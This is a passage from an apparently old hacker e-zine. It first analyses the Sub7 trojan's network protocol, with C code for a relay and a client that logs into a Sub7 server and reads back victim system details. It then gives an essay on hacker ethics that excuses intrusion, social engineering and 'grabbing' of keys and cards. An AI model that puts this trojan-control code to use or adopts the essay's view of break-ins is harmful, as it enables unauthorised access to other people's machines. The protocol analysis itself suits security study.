} while(r != -1);
printf("Server socket died.\n");
exit(0);
}
void client_side_thread(void *param)
{
char buf[MAX_PACKET_SIZE];
int r, c;
do
{
memset((char *)&buf, 0, MAX_PACKET_SIZE);
r = recv(cs, (char *)&buf, MAX_PACKET_SIZE, 0);
if (r > 0)
{
c = 0;
printf("Client: [");
do
{
printf("%x ", buf[c]);
c++;
} while(c < r);
printf("]\n", buf);
send(ss, (char *)&buf, r, 0); // Forward to server socket
}
} while(r != -1);
printf("Client socket died.\n");
exit(0);
}
//------------------------------- *snip* -------------------------------
Recompile, run, and connect like before. This time though, don't do anything
but connect (we only need a few messages). The output should look something
like this:
[snip]
Waiting for connection...accepted from [127.0.0.1].
Connecting to [127.0.0.1]...
Linked: [127.0.0.1]<->[127.0.0.1]
Server: [50 57 44 ]
Client: [50 57 44 68 65 6c 6c 6f ]
Server: [63 6f 6e 6e 65 63 74 65 64 2e 20 32 30 3a 32 32 2e 30 34 20 2d 20 41 70
72 69 6c 20 35 2c 20 32 30 30 30 2c 20 57 65 64 6e 65 73 64 61 79 2c 20 76 65 7
2 73 69 6f 6e 3a 20 47 4f 4c 44 20 32 2e 31 ]
[snip]
It looks as though there are no terminating characters, so the messages must
be differentiated by what packets they arrive in.
Let's take a look at that the message box message again:
MW:51titleZJXXtext
The format is probably:
MW:<button><icon><title>ZJXX<text>
<button> - character representing the button combo.
<icon> - character representing the icon.
<title> - string to be displayed in the message box title.
<text> - string to be displayed in the body of the message box.
Back to the password prompt: what happens if the password is incorrect?
[snip]
Server: [PWD]
Client: [PWDsfdssdf]
Server: [POPUP incorrect password...]
[snip]
Now, the client doesn't display any popup. In fact, I see no "incorrect
password" message anywhere. I haven't gone into this any further, but the
bottom line is that this is the indication given that this is the wrong
password, and the connection is killed.
Well, that concludes what we will learn about that part of the protocol. Now
for some source code. All it does is connects to a Sub7 server, and prompts
for password (if required). Yes it is pointless, but yes it is also
educational. So read it.
//------------------------------- *snip* -------------------------------
// subc.c
#include <stdio.h>
#include <winsock.h>
#define BUF_LEN 300
void fatal_error(char *msg);
int connect_sock(int sock, char *host, int port);
void start_winsock();
#define CONNECTION_PREFIX "connected."
void main(int argc, char *argv[])
{
int s, l, r, c, d;
char buf[BUF_LEN];
char input[256];
char tmp[256];
if (argc < 3)
{
printf("usage: subc <host> <port>\n");
exit(1);
}
start_winsock();
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) fatal_error("Could not create socket.");
printf("Connecting...");
connect_sock(s, argv[1], atoi(argv[2]));
printf("done.\n");
l = 0;
do
{
memset((char *)&buf, 0, BUF_LEN);
// We don't quite fill the buffer to the top, so that it is
// always null-terminated.
r = recv(s, (char *)&buf, BUF_LEN - 1, 0);
if (r > 0)
{
if (!strcmp(buf, "PWD"))
{
printf("Enter password: ");
gets((char *)&input);
sprintf((char *)&tmp, "PWD%s", (char *)&input);
send(s, (char *)&tmp, strlen(tmp), 0);
}
else if (!strcmp(buf, "POPUP incorrect password..."))
{
printf("Incorrect password.\n");
closesocket(s);
exit(1);
}
else
{
c = 0;
d = 0;
do
{
if (buf[c] != CONNECTION_PREFIX[c]) d = 1;
c++;
} while((c < strlen(CONNECTION_PREFIX)) && (!d));
if (!d)
{
printf("%s\n", buf);
l = 1; // Connection successful!
}
else printf("%s\n", buf); // Misc. messages
}
}
else if (r == -1) fatal_error("Socket died.");
if (send(s, "", 0, 0) == -1) fatal_error("Socket died.");
} while(!l);
closesocket(s);
return;
}
void fatal_error(char *msg)
{
printf("Fatal error: %s\n", msg);
exit(1);
}
int connect_sock(int sock, char *host, int port)
{
struct sockaddr_in addr;
struct hostent *he;
memset(&addr, '0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(host);
addr.sin_port = htons(port);
if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host.");
if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) fatal_error("Error connecting.");
return 0;
}
void start_winsock()
{
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) fatal_error("Unable to initialise Winsock.");
}
//------------------------------- *snip* -------------------------------
Run dumpprot (the old version, not dumphex). Connect as before in this text.
Click on the "connection" menu on the left of the client. Select "get pc
info" item. Click on "retrieve". dumpprot's output should be something like
this:
[snip]
Client: [GMI]
Server: [GMIMICHAEL
Michael
C:\WINDOWS
C:\WINDOWS\SYSTEM
Michael
4.0 (1111. B)
Windows 95
800,600
24
CyrixInstead
234.0 MHz
2,150,768,640 bytes
1,955,995,648 bytes
1
]
[snip]
This is all pretty straight forward, but we must find what character
terminates each line (it is either 0xd or 0xa, or both). Run dumphex and do
the same. Your output should look like this:
[snip]
Client: [47 4d 49 ]
Server: [47 4d 49 4d 49 43 48 41 45 4c d a 4d 69 63 68 61 65 6c d a 43 3a 5c 57
49 4e 44 4f 57 53 d a 43 3a 5c 57 49 4e 44 4f 57 53 5c 53 59 53 54 45 4d d a 4d
69 63 68 61 65 6c d a d a 34 2e 30 20 28 31 31 31 31 2e 20 42 29 d a 57 69 6e 64
6f 77 73 20 39 35 d a d a 38 30 30 2c 36 30 30 d a d a 32 34 d a 43 79 72 69 78
49 6e 73 74 65 61 64 d a 32 33 31 2e 30 20 4d 48 7a d a 32 2c 31 35 30 2c 37 36
38 2c 36 34 30 20 62 79 74 65 73 d a 31 2c 39 35 36 2c 35 31 39 2c 39 33 36 20
62 79 74 65 73 d a 31 d a ]
[snip]
The first line is 10 characters long. If we count across 10 characters we
find the string "\xd\xa" (C style, that is). This terminates the lines. The
rest is pretty simple:
Server: [GMICHOPSUI // After "GMI" is the m$ networking workstation name //
Chopsuicide // currently logged in m$ networking user.
C:\WINDOWS // Windows directory //
C:\WINDOWS\SYSTEM // System directory
Chopsui-cide // Name Windows is registered to //
The Mad Miget Mafia // Company this person comes from //
4.0 (1111. B) // Version information //
Windows 95 // Version information //
// Windows "key"? Comes up blank on my system //
800,600 // Screen resolution //
// DirectX version //
24 // Bit depth in bpp //
CyrixInstead // CPU vendor info //
234.0 MHz // Guessed CPU speed. Not very accurate. //
2,150,768,640 bytes // Size of C: drive //
1,955,995,648 bytes // Available space //
1 // Number of clients connected //
]
As seems typical of the Sub7 client, all these values appear to be shoved
straight into their respective labels. It also performs no sanity checking -
ie, it update the info even if it did not request it.
Well, that concludes this text. I hope you have learned something here, and
hope that when you know more you too share your knowledge with others.
=============================================================================
@HWA
263.0 Elf Orin: The meaning of being a hacker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HACKER BEING
on the meaning of being a hacker
by Valerio "Elf Qrin" Capello (http://www.ElfQrin.com)
Copyright (C) 1999 Valerio Capello
First written: 23JAN2000
v1.1eng 26MAR2000
This is a translation from the original Italian version v1.5 r23JAN2000
(first written: 31AUG1999-09SEP1999)
Supervisor for the English language: SirD.
Latest version available from: http://www.ElfQrin.com/docs/BeingHacker.html
"But did you, in your three- piece psychology and 1950's
technobrain, ever take a look behind the eyes of the hacker?
Did you ever wonder what made him tick,
what forces shaped him, what may have molded him?
I am a hacker, enter my world..."
("The Conscience of a Hacker", The Mentor)
"Fear them not therefore: for there is nothing covered, that
shall not be revealed; and hid, that shall not be known"
(Matthew 10:26)
THE HACKER
Another idiot has been locked up because of committing a senseless act
with little or no thought to the consequences. Law enforcement needs to
look good, the news becomes public domain and the press is unleashed,
using attention grabbing headlines like: "Computer terrorist busted", or
better, a "hacker".
Not only is the term misused, but it is usually only understood to be a
mere synonym for "computer pirate", which is not only limitive, but
completely wrong. Few people, even those who would define themselves as
such, really know what "being a hacker" means.
The WWWebster Online Dictionary (http://www.m-w.com/), at the "hacker"
entry says:
Main Entry: hacker Pronunciation: 'ha-k&r Function: noun Date: 14th
century 1 : one that hacks 2 : a person who is inexperienced or
unskilled at a particular activity "a tennis hacker" 3 : an expert
at programming and solving problems with a computer 4 : a person who
illegally gains access to and sometimes tampers with information in
a computer system
Among the various meanings quoted above, (besides definition 1, which is
obvious...), definition 4 is the one which generally corresponds to the
idea of "the hacker" that the majority of people have, while definition
3, is the one which is actually closer to the real meaning of "hacker",
even if it is still rather limiting.
A dictionary rarely gives a definative answer, but it is always a good
start. For a more precise definition we can consult a specific dictionary
such as the Jargon File, the most prestigious dictionary of hacker
terminology, "a comprehensive compendium of hacker slang illuminating
many aspects of hackish tradition, folklore, and humor", begun by Raphael
Finkel of the university of Stanford in 1975, and then passed in
management to Don Woods of the MIT, up to see the light of the printed
paper in 1983, with the title of "The Hacker's Dictionary" (Harper & Row
CN 1082, ISBN 0-06-091082-8, also known in the scene as "Steele-1983").
The on-line hacker Jargon File, version 2.9.10, 01 JUL 1992 (part of the
Project Gutenberg), at the "hacker" entry says:
:hacker: [originally, someone who makes furniture with an axe] n. 1.
A person who enjoys exploring the details of programmable systems
and how to stretch their capabilities, as opposed to most users, who
prefer to learn only the minimum necessary. 2. One who programs
enthusiastically (even obsessively) or who enjoys programming rather
than just theorizing about programming. 3. A person capable of
appreciating {hack value}. 4. A person who is good at programming
quickly. 5. An expert at a particular program, or one who frequently
does work using it or on it; as in `a UNIX hacker'. (Definitions 1
through 5 are correlated, and people who fit them congregate.) 6. An
expert or enthusiast of any kind. One might be an astronomy hacker,
for example. 7. One who enjoys the intellectual challenge of
creatively overcoming or circumventing limitations. 8. [deprecated]
A malicious meddler who tries to discover sensitive information by
poking around. Hence `password hacker', `network hacker'. See
{cracker}.
Since this is a specific dictionary, the definition of hacker here is
closer to its original meaning, even if it is necessary to extrapolate it
from the varied proposed meanings in order to obtain the closest and most
faithfull interpretation.
A hacker is a person that loves to study all things in depth (definition
1), especially the more apparently meaningless details, to discover
hidden peculiarities, new features and weakness in them. For example, it
is possible to hack a book, by using it to equalize the legs of a table,
or to use the sharp edge of one of its pages to cut something. The main
point being that it is used for more than it's conventional function of
being read. But more than this, a hacker soon learns that the same
techniques used for exploiting computer systems can be used to manipulate
people. This is the so-called social hacking. With a little skilled
psychology, the masters of "social hacking" can convince other people to
do what they want (within limits of course, and depending on the
abilities of the "social hacker"), in order to obtain the information
they require. This may sound like an unusual and unatural practise, but
once you take into account that this is performed quite regularly, in
everyday life, by girlfriends, friends and teachers etc. to obtain what
they want from others, it's not that strange, even if hackers do use a
little more skill and technique. Another way of bringing hacking out from
the computer's world, is the so-called vadding (the term is actually
rarely used, but the activity is largely practiced) this consists of
exploring places where the average person doesn't normally have access,
such as basements, roofs of public buildings, maintenance tunnels,
elevator wells and similar places. Sometimes, some of these activities
born inside the hacker scene, grow and eventually separate, becoming new
entities, like phreaking, the term applied to the world of "hacking"
telephones and telephone systems, or the term carding, which is basically
"techno-credit card fraud",.. very illegal and risky. In short, a hacker
has the tendency to use his skills also beyond of the computer context,
and anywhere tends to use the hacking techniques and to discover what is
normally hidden to the common man. For a hacker, the ability to reason,
harness his full brain capacity and maintain his mind at maximum
efficiency levels, is most important. With a few exceptions, it is
unusual that a hacker would smoke, use drugs, or drink excessively
(however beer appears to be the preferred choice, when alcohol is drunk).
Speaking of John Draper, (a.k.a "Captain Crunch", one of the most
legendary phreaker/hackers, famous for discovering that by sending a tone
of 2600Hz over the telephone lines of AT&T, it was possible to effect
free calls), Steven Levy says: "Cigarettes made him violent": smoking
next to him was extremely hazardous to your health...
A hacker is certainly a programming maniac, (definition 2): once a
technique has been discovered, it is necessary to write a program that
exploits it. Hackers often spend many day's and night's in front of a
computer, programming or experimenting with new techniques. After
spending so many hours in front of a computer, a hacker gains a
remarkable ability to analyze large amounts of data very quickly. The
ability to program quickly, (definition 4) can be a characteristic of a
hacker, but is not always necessarily so. As far as a hacker is
concerned, it is faster to type on a keyboard, than it is to write things
down, many hackers spend quite a lot of time reflecting over, or
analyzing previously written code, while they are programming. Definition
5 is, in effect, a restrictive meaning of the word "hacker" since it
limits it to a single field (as in UNIX), it can however be considered as
a specialization. Actually in these cases, especially when it concerns
true experts in a field, the terms wizard or guru are preferred. For
example, the definition "UNIX wizard" in the United States is also
recognized outside of the hacker environment and it can be included in a
resume.
Definition 3 may be considered apart: a person that qualifies for this
definition is not neccasarily a real hacker, but a very experienced
person with a good knowledge, who is not neccasarily able to develop
hacker techniques. To make it clearer, think about the differences
between a good author and someone that appreciates a good book.
Definition 7, together with definition 1, are the ones that get closer to
the real essence of the hacker. To study a system, to discover
weaknesses, the peculiarities and hidden features of it, and then use
them to go beyond its limits, with creativeness and imagination. This, in
a certain way, brings us directly to definition 8. The person with these
skills can use his knowledge to try to access information to which he
doesn't have the right to access, and here the discourse gets
complicated, because for a hacker there is no information which he does
not have the right to access. We will get back to this point later, when
we will speak about the "hacker ethic".
Finally, although it has nothing to do with the character of the hacker,
I would like to attract attention to definition 6; for a hacker, the term
hacker is always positive: if he speaks of a "hacker of astronomy", he
speaks of a true expert of that subject. Contrary to this, in everyday
language, according to definition 2 of the WWWebster dictionary, a
"hacker" in a certain field is a person that is not skilled in that
specific field.
After giving the definitions, the Jargon File provides more information
on the meaning of the word "hacker":
The term `hacker' also tends to connote membership in the global
community [...]. It also implies that the person described is seen
to subscribe to some version of the hacker ethic [...].
It is better to be described as a hacker by others than to describe
oneself that way. Hackers consider themselves something of an elite
(a meritocracy based on ability), though one to which new members
are gladly welcome. There is thus a certain ego satisfaction to be
had in identifying yourself as a hacker (but if you claim to be one
and are not, you'll quickly be labeled {bogus}). [...] [or most
commonly, the most used term in these circumstances is "lamer", even
if next versions of the Jargon File use this term in a slightly
different context]
But, perhaps more than anything else, curiosity and above average
intelligence are the signatures of a true hacker. The hacker has an
almost physical need of knowledge of any kind. The hacker is most
certainly a voracious reader, even if his preference is only for
scientific matters or science fiction, and generally one would find many
shelves full of books in his room. But a hacker is not satisfied by the
"ready made" knowledge, of the information that he finds in the books
written for the average person, a hacker wants it all, and collects all
possible information. Schools are institutions that are not able to
furnish all the information that a hacker needs. The governments and all
the public or private institutions have the tendency to furnish the least
necessary information. About this point, Steven Levy in "Hackers, Heroes
of the Computer Revolution" (written in 1984), affirms that the hackers
"are possessed not merely by curiosity, but by a positive *lust to
know.*"
This idea is even clearer in these excerpts took from what is a
considered "the hacker's manifesto": "The Conscience of to Hacker"
(sometimes erroneously reported, in a nearly prophetic sense, as
"Mentor's Last Words"), written by The Mentor on January 8th 1986, and
published for the first time on the e-zine Phrack, Volume One, Issue 7,
Phile 3. This text collects in a few paragraphs, a large part of the
hacker philosophy, with touching results for most true hackers (even if
it may be difficult to think of a hacker as a person that has a heart as
well as a brain).
[...]
Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me... Damn
underachiever.
[...]
we've been spoon-fed baby food at school when we hungered for
steak... the bits of meat that you did let slip through were
pre-chewed and tasteless. We've been dominated by sadists, or
ignored by the apathetic. The few that had something to teach found
us willing pupils, but those few are like drops of water in the
desert.
[...]
We explore... and you call us criminals. We seek after knowledge...
and you call us criminals. We exist without skin color, without
nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to
us and try to make us believe it's for our own good, yet we're the
criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they
look like. My crime is that of outsmarting you, something that you
will never forgive me for.
[...]
In these words, you will see the frustration of living in a defective
world, that deprives the individuals that wish to rise above the
mediocre, of the very information and resources they desire, to know what
is kept hidden, and it condemns them hypocritically as criminals.
But the desperate search of knowledge is only one of the characteristics
of the hacker. Another sure one is the pursute of extreme perfection. An
interesting article, is the one that narrates the history of the first
hackers, and of how they developed "Spacewar!" (the first videogame in
history, born as a demo for the TX-0, meant as a "killer application" for
this computer, with all its features exploitable), is "The origin of
Spacewar", written by J. M. Graetz, and published in the August, 1981
issue of Creative Computing magazine.
One of the forces driving the dedicated hacker is the quest for
elegance. It is not sufficient to write programs that work. They
must also be "elegant," either in code or in function -- both, if
possible. An elegant program does its job as fast as possible, or is
as compact as possible, or is as clever as possible in taking
advantage of the particular features of the machine in which it
runs, and (finally) produces its results in an aesthetically
pleasing form without compromising either the results or operation
of other programs associated with it.
But the elegance and the perfection of hackers is not always
comprehensible to the average individual. A hacker can often be in
ecstasy reading some code written by another hacker, admiring his ability
and "tasting" his style, as if he was reading poetry.
For example, normally to exchange the content of two variables (a and b,
in this case), the statement most commonly used is this, which uses a
third temporary variable:
dummy = a : a = b : b = dummy
The following method, instead, doesn't need the third variable, because
it exploits a mathematical peculiarity of the boolean operator XOR:
a = a XOR b : b = a XOR b : a = a XOR b
Even if this system is at least three times slower than the first one
because it requires the execution of three mathematical operations,
(however it allows the saving of memory that the third variable would
normally occupy), a hacker will surely admire the ingeniousness and the
elegance of this method, to him it assumes the taste of a Japanese haiku.
Talking about the perfectionism of the hackers, in "Hackers: Heroes of
the Computer Revolution" written by Steven Levy in 1984, in the chapter 2
("The Hacker Ethic"), we read:
Hackers believe that essential lessons can be learned about the
systems--about the world--from taking things apart, seeing how they
work, and using this knowledge to create new and even more
interesting things. They resent any person, physical barrier, or law
that tries to keep them from doing this.
This is especially true when a hacker wants to fix something that
(from his point of view) is broken or needs improvement. Imperfect
systems infuriate hackers, whose primal instinct is to debug them.
This is one reason why hackers generally hate driving cars--the
system of randomly programmed red lights and oddly laid out one-way
streets causes delays which are so goddamned UNNECESSARY that the
impulse is to rearrange signs, open up traffic-light control boxes .
. .redesign the entire system.
In a perfect hacker world, anyone pissed off enough to open up a
control box near a traffic light and take it apart to make it work
better should be perfectly welcome to make the attempt.
It's just in the name of such principle that the Linux operating system
and the Gnu C compiler have been developed, their code is open and
available to be changed and modified by anyone. Lately, many important
commercial software producers also started moving in this direction, as
Netscape: Netscape Communicator 5, will, in fact be the first software,
originally born as a "closed" commercial product, to be developed with
this type of philosophy.
A hacker is never satisfied with the default settings of a program or of
the custom installations, he always has to open the configuration menu
and set the options to get the maximum performance, and to make the
product work as close as possible to his "way". A hacker must be able to
use, to modify and to check all the possible features of a program.
But after all, what motivates hackers? Why do they create programs that
exploit advanced techniques and then distribute them free? And why do
they freely distribute knowledge that was incredibly difficult to obtain?
A good answer could be found in the site of the KIN (Klever Internet
Nothings, http://www.klever.net), they are not exactly a hacker crew, but
a group of people that write programs and release them freely on the
Internet:
What makes people write software and distribute it for free? Vanity,
you said? Well, maybe.. But after all, what is this business all
about? Is it all about money? Ask anyone - it's not. Most people I
know in the industry will tell you that. Their idea is "just leave
me alone and let me do what I love to do".
In short, it's not about money. It's about feeling free to do what you
want, and, just possibly, to find someone that appreciates your work.
THE HACKER ETHIC
The true hacker doesn't have morals, and he would never censor
information or ideas of any kind. An initiative of the Italian priest Don
Fortunato di Noto, (fortunad@sistemia.it,) who in January of 1998 formed
the "Committee of resistance against the Pedophiles", and who asked for
the help of the hacker community to unmask, capture and close the sites
of the pedophiles on the Internet, failed miserably as it was only
supported by self-acclaimed hackers without any skill. Besides, hackers
are tolerant by nature, and rarely get angry, but they are irritated by
people and tasks perceived to be wasting their time. There are however,
some things that hackers can be intolerant of. One of these is when lies
are told, to, or about them, you can say that hackers are imbeciles (it's
an opinion, after all), but you can not say that they steal chickens. And
yet, it would still be unusual that hackers would hack a site to remove
the lies propogated about them. It would be more typical that they would
create another site, refuting the lies against them. Hacking can be used
like as a form of protest, breaking into and modifying the websites of
very well known societies and government or military corporate entities,
can be a way to make public certain injustices (especially attacks to the
liberty of information or expression) or violations of human rights. The
hacks, of the websites of the CIA (that became Central Stupidity Agency)
and of the Department of Justice, are famous for being hacked with this
intention in mind. In the article "Hacking for Human Rights?" by Arik
Hesseldahl (ahess@reporters.net) published on the online magazine Wired
(http://www.wired.com) dated 14.Jul.98 9:15am, the hacker Bondie Wong, (a
dissident Chinese astrophysicist who lives in Canada, that temporarily
disabled a Chinese satellite in 1997), a member of the famous hacker
crew, Cult of the Dead Cow (which in the beginning of 1999 released the
Back Orifice trojan) threatened to attack the computer networks of
foreign companies that did business with China, causing them serious
damages and huge financial losses. In an interview conducted by Oxblood
Ruffin, a former United Nations consultant, and published on Wired,
Blondie Wong says: "Human rights is an international issue, so I don't
have a problem with businesses that profit from our suffering paying part
of the bill".
Contrary to the complete lack of moral judgement (but, above all, of
moralism) of hackers, lies a deep ethical sense, that is something
allmost "religious" in most hackers. About this point, we can go back to
the Jargon File:
:hacker ethic, the: n. 1. The belief that information-sharing is a
powerful positive good, and that it is an ethical duty of hackers to
share their expertise by writing free software and facilitating
access to information and to computing resources wherever possible.
2. The belief that system-cracking for fun and exploration is
ethically OK as long as the cracker commits no theft, vandalism, or
breach of confidentiality.
Both of these normative ethical principles are widely, but by no
means universally) accepted among hackers. Most hackers subscribe to
the hacker ethic in sense 1, and many act on it by writing and
giving away free software. A few go further and assert that *all*
information should be free and *any* proprietary control of it is
bad [...]
Sense 2 is more controversial: some people consider the act of
cracking itself to be unethical [...] But this principle at least
moderates the behavior of people who see themselves as `benign'
crackers (see also {samurai}). On this view, it is one of the
highest forms of hackerly courtesy to (a) break into a system, and
then (b) explain to the sysop, preferably by email from a
{superuser} account, exactly how it was done and how the hole can be
plugged --- acting as an unpaid (and unsolicited) {tiger team} [The
"tiger team" derives from the U.S. military jargon. These people are
paid professionals who do hacker-type tricks, e.g., leave cardboard
signs saying "bomb" in critical defense installations, hand-lettered
notes saying "Your codebooks have been stolen" (they usually haven't
been) inside safes, etc. Serious successes of tiger teams sometimes
lead to early retirement for base commanders and security officers].
[...]
Breaking into a system is not seen by the hacker as a criminal action,
but like a challenge. The idea is not to damage the "victim", but to find
a way to penetrate its defenses. It's the intellectual challenge, the
curiosity, the will to experiment and to explore, this is what moves the
hacker, not the will to damage someone or something, and not even to
obtain personal profit.
In another writing of The Mentor, "A Novice's Guide to Hacking- 1989
edition", dated December 1988, the author opens the essay with a call to
the ethics of the category, to which follows a list of "suggestions for
guidelines to follow to ensure that not only you stay out of trouble, but
you pursue your craft without damaging the computers you hack into or the
companies who own them":
As long as there have been computers, there have been hackers. In
the 50's at the Massachusets Institute of Technology (MIT), students
devoted much time and energy to ingenious exploration of the
computers. Rules and the law were disregarded in their pursuit for
the 'hack'. Just as they were enthralled with their pursuit of
information, so are we. The thrill of the hack is not in breaking
the law, it's in the pursuit and capture of knowledge.
In a file titled "The Hotmail Hack" written by Digital Assassin of the
"United Underground" (or "U2", for short), in which a weakness of the
HotMail system is illustrated, through which it is possible to enter into
the mailbox of another person, the author, at a certain point interrupts
the explanation with these words:
....but before I tell you how to use that line, I'm going to side
track for a little theory behind this hack. Because there's NO point
in a hack, if you don't know how it works. That is the whole idea of
hacking, to find out how systems work.
These are clear examples of what the real intent of a hacker is when he
breaks a system. It's very close to the idea of a child that opens a toy
to see how it works. The difference is that the hacker tries not to
destroy the toy (aside from the fact that the toy is not his own...).
Anyway, let's see the specific definition of the "cracker", according to
the Jargon File:
:cracker: n. One who breaks security on a system. Coined ca. 1985 by
hackers in defense against journalistic misuse of {hacker} (q.v.,
sense 8). An earlier attempt to establish `worm' in this sense
around 1981--82 on USENET was largely a failure.
Both these neologisms reflected a strong revulsion against the theft
and vandalism perpetrated by cracking rings. While it is expected
that any real hacker will have done some playful cracking and knows
many of the basic techniques, anyone past {larval stage} is expected
to have outgrown the desire to do so.
Thus, there is far less overlap between hackerdom and crackerdom
than the {mundane} [the term "mundane" is taken from the Sci-Fi
fandom and identifies everything outside the world of the computer
science, or the hacking] reader misled by sensationalistic
journalism might expect. Crackers tend to gather in small,
tight-knit, very secretive groups that have little overlap with the
huge, open poly-culture this lexicon describes; though crackers
often like to describe *themselves* as hackers, most true hackers
consider them a separate and lower form of life.
Ethical considerations aside, hackers figure that anyone who can't
imagine a more interesting way to play with their computers than
breaking into someone else's has to be pretty {losing} [on the other
hand, they have the same consideration for the people who use the
computer in an absolute conventional way, such as only to write
documents or to play] [...]
Furthermore, about the "cracking" itself, the Jargon File says:
:cracking: n. The act of breaking into a computer system; what a
{cracker} does. Contrary to widespread myth, this does not usually
involve some mysterious leap of hackerly brilliance, but rather
persistence and the dogged repetition of a handful of fairly
well-known tricks that exploit common weaknesses in the security of
target systems. Accordingly, most crackers are only mediocre
hackers.
However, This is a superficial and reductive vision. In fact, as it is
easily imaginable, there exist people, that are as experienced with
computers and as thirsty of knowledge, that however don't have any
respect of the hacker ethic and don't hesitate to perform actions meant
to damage computer systems or other people. They are the so-called
Dark-side hackers. This term derives from George Lucas' "Star Wars". A
Dark-side hacker, just like Darth Vader, is "seduced by the dark side of
the Force". It has nothing to do with the common idea of "good" and
"bad", but it's closer to the idea of "legal" and "chaotic" in
Dungeons&Dragons: In substance, the dark-side hackers are accorded the
same dignity and recognized as having the ability of a hacker, but their
orientation makes them a dangerous element for the community. A more
common definition, reserved for those that damage someone else's computer
systems without drawing any benefit from it, (therefore for pure
stupidity or evilness), it is that of Malicious hackers.
More recent versions of the Jargon File (in which some most obsolete
terms have been removed), as the version 4.0.0, 24 JUL 1996, makes clear,
not only the distinction between hacker and cracker, but also between the
entire hack scenes and other parallel realities, like piracy, and the
"warez d00dz", who collect an impressive amount of software (games and
applications, or better said "gamez" and "appz"), that they are never
likely to use, and whose greatest pride is to get software, break its
protections, and distribute it on their website before their rival crew,
where possible, within the same day it was released ("0-day warez").
One could think that the Jargon File speaks only in theory, and that it
describes the hacker ethic in a fantastic and utopian way. This is not
so, hackers really are attached to their principles. The following is a
practical example concerning one of the most famous hacker crews, the LOD
(Legions Of Doom, that takes its name from the group of baddies in the
series of cartoons of Superman and his Superfriends), of which The Mentor
was also a member during the years 1988-89 (the already cited author of
"The conscience of a Hacker").
In "The History of LOD/H", Revision #3 May 1990, written by Lex Luthor
(founder of the crew, from the name of the baddie in the movie Superman
I), and published on their e-zine "The LOD/H Technical Journal", Issue
#4, released on May 20, 1990 (File 06 of 10), we can read:
Of all 38 members, only one was forcefully ejected. It was found out
that Terminal Man [member dof the LOD/H in 1985] destroyed data that
was not related to covering his tracks. This has always been
unacceptable to us, regardless of what the media and law enforcement
tries to get you to think.
Yet, not all agree upon the same principles, and there are some "grey
areas": for example, taking possession of objects that allow you to
access information, or pursuing a personal purpose, can be considered
"ethical" by some. A specific example could be "grabbing": the theft of
things like keys, magnetic cards, manuals or technical schemes, anyway
this is a debatable activity, since a hacker prefers to copy rather to
subtract, not only to not damage the "victim", but also to avoid leaving
traces of his intrusion. A more acceptable and legal variant is
"trashing", that consists in looking inside the garbage of the subject,
searching for objects and/or useful information.
But breaking into computer systems is only a small activity amongst the
many things that hackers are involved in, and the aversion against the
virtual vandal actions are a small part of the hacker ethic. The hacker
ethic is something greater, almost mystic, and draws its origins from the
first hackers, those that programmed the TX-0, using the first available
computers in the big American universities like MIT or Stanford. From the
already cited "Hackers, Heroes of the Computer Revolution" by Steven
Levy:
Something new was coalescing around the TX-0: a new way of life,
with a philosophy, an ethic, and a dream.
There was no one moment when it started to dawn on the TX-0 hackers
that by devoting their technical abilities to computing with a
devotion rarely seen outside of monasteries they were the vanguard
of a daring symbiosis between man and machine. With a fervor like
that of young hot-rodders fixated on souping up engines, they came
to take their almost unique surroundings for granted, Even as the
elements of a culture were forming, as legends began to accrue, as
their mastery of programming started to surpass any previous
recorded levels of skill, the dozen or so hackers were reluctant to
acknowledge that their tiny society, on intimate terms with the
TX-0, had been slowly and implicitly piecing together a body of
concepts, beliefs, and mores.
The precepts of this revolutionary Hacker Ethic were not so much
debated and discussed as silently agreed upon. No manifestos were
issued ["The Mentor"'s one, very polemic, was written only about
twenty years later]. No missionaries tried to gather converts. The
computer did the converting [...]
Shortly, Steven Levy sums up the "hacker ethic" this way:
Access to computers -- and anything which might teach you something
about the way the world works -- should be unlimited and total.
Always yield to the Hands-On imperative.
All information should be free.
Mistrust Authority. Promote Decentralization.
Hackers should be judged by their hacking, not bogus criteria such
as degrees, age, race, or position.
You can create art and beauty on a computer.
Computers can change your life for the better.
LIKE ALADDIN'S LAMP, YOU COULD GET IT [THE COMPUTER] TO DO YOUR
BIDDING.
THE LAMER
From "The Hacker Crackdown - Law and Disorder on the Electronic Frontier"
by Bruce Sterling, Bantam Books, 1992. (ISBN 0-553-08058-X, paperback:
ISBN 0-553-56370-X, released as free electronic text for non-commercial
purposes)
There are hackers today who fiercely and publicly resist any
besmirching of the noble title of hacker. Naturally and
understandably, they deeply resent the attack on their values
implicit in using the word "hacker" as a synonym for
computer-criminal.
[...]
The term "hacking" is used routinely today by almost all law
enforcement officials with any professional interest in computer
fraud and abuse. American police describe almost any crime committed
with, by, through, or against a computer as hacking.
If the differentiation between hacker, cracker and dark-side hacker can
result a very tiny distinction for the ones who live outside of the
computer scene, nobody, especially a journalist, should confuse a hacker
with the poor idiot that was locked up for using, with no thought to the
consequences, programs that he found somewhere. (even if using the term
"hacker" does sell more newspapers... The difference between hackers and
journalists is that the aforementioned have ethics, the latter, not even
a sense of modesty... but this is often simply mere ignorance).
Let's take as an example the following article published on the Italian
newspaper "L'Unione Sarda" (http://www.unionesarda.it/), by Luigi
Almiento (almiento@unionesarda.it).
POLICE.
The arrested hacker is a surveyor, aged 25
Files were stolen from the computers of internet "navigators", with the
aid of a virus spread on the Internet
Many people from different national service providers, recently learned to
their own detriment, that it is better not to stay and chat to strangers on
the chat-lines of the Internet. This occured when a hacker aged 25, obtained
the user names and passwords of their dial up accounts, while they were
on-line.
[...]
"Harris", explains the lieutenant Saverio Spoto, commander of the Police
Station [actually they are "Carabinieri", not the normal Police, because in
Italy there are two different polices, don't ask why], � contacted his victims
through Icq, a "talking place", offered by many Internet providers�. During
these "written talks", using an access key he acquired that gives false
information, G. F. sent the Netbus virus to the computers of his victims.
This allowed him to "navigate" the hard drives of the computers of these
